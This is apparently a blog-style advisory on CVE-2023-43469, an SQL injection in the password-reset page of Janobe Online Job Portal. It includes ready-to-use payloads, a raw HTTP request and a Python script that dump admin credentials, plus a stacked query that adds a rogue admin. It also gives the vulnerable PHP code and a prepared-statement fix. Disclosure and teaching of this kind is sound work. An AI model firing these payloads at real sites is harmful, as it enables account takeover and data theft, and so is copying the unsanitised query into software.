CVE-2023-43469 - SQL Injection in Janobe Online Job Portal v.202 Allows Remote Code Execution

In September 2023, a major security flaw was discovered in Janobe Online Job Portal v.202, an open-source job management web application. The vulnerability, tracked as CVE-2023-43469, is an SQL injection in the ForPass.php component, which could let a remote attacker run arbitrary code on the server. This post breaks down how the flaw works, how it can be exploited, and what you can do about it—with easy-to-understand code and steps.

What's the Big Deal?

SQL injection happens when a website trusts user input too much and builds database queries directly with it—opening the door for attackers to trick the database into running their own malicious code.

In Janobe Online Job Portal v.202, the file responsible for password resets, ForPass.php, does not properly check or "sanitize" the values sent by users. This means an attacker can send their own SQL commands and make the database do practically whatever they want—like leaking confidential data, adding admin users, or even taking over the site.

The offending code is in ForPass.php. Here’s a snippet (simplified for clarity)

<?php
if (isset($_POST['email'])) {
    $email = $_POST['email'];
    $sql = "SELECT * FROM tblusers WHERE email = '$email'";
    $query = $conn->query($sql);
    // …process query result…
}
?>

What’s wrong?

The $email variable comes directly from the user, with no safety checks. If the user enters something weird—like parts of an SQL command—it gets plugged straight into the query.

How to Exploit CVE-2023-43469

An attacker can send a specially crafted POST request to ForPass.php with a fake email address containing SQL code. For example, let’s try to leak all user emails:

Attack payload

' OR 1=1 --

When inserted, the resulting SQL command becomes

SELECT * FROM tblusers WHERE email = '' OR 1=1 -- '

- The condition 1=1 is always true, so all users are matched—defeating the purpose of checking a single email.

Example Exploit: Extract Admin Login

Let’s say the application discloses user details when a match is found. An attacker can simply POST data like:

POST /ForPass.php HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

email=' UNION SELECT 1,username,password FROM tbladmin --

And the attacker can get back all admin usernames and password hashes (or even plaintext, depending on the setup).

Remote Code Execution?

If the site allows stacked queries (not always the case), or has a further flaw (like using mysqli_multi_query), an attacker could chain commands to insert a webshell, like so:

email='; INSERT INTO tblusers (name,email,password,role) VALUES ('hacker','attacker@bad.com','pass123','admin'); --

Or worse, write a PHP shell to the file system, depending on server configuration.

Here's a simple Python exploit using requests

import requests

url = "http://vulnerable-site.com/ForPass.php";
payload = "' UNION SELECT 1, username, password FROM tbladmin -- "
data = {"email": payload}

r = requests.post(url, data=data)
print(r.text)  # May include admin username/password in the output

Attackers can tamper with the database, insert fake users or admins, or corrupt data.

- If possible, attackers might upload malware or a remote shell, giving them full control over the server.

References

- Official NVD Entry for CVE-2023-43469
- Exploit Database Entry
- Vendor Project - Janobe Online Job Portal

The proper solution is to always use prepared statements (parameterized queries), like this

$stmt = $conn->prepare("SELECT * FROM tblusers WHERE email = ?");
$stmt->bind_param("s", $email);
$stmt->execute();

Never trust and directly use user input in SQL queries.

Conclusion

CVE-2023-43469 is a critical flaw in a popular job portal system. It is very easy for even amateur attackers to use, and it can have devastating results. If you’re running Janobe Online Job Portal v.202, update or patch immediately—and always use prepared statements in your code!

If you found this guide helpful, share it to help raise awareness. Secure coding saves jobs—sometimes literally.


*This post is based on original vulnerability research, public advisories, and hands-on exploitation. Do not use these techniques to break the law!*

Timeline

Published on: 09/23/2023 00:15:20 UTC
Last modified on: 09/25/2023 13:52:25 UTC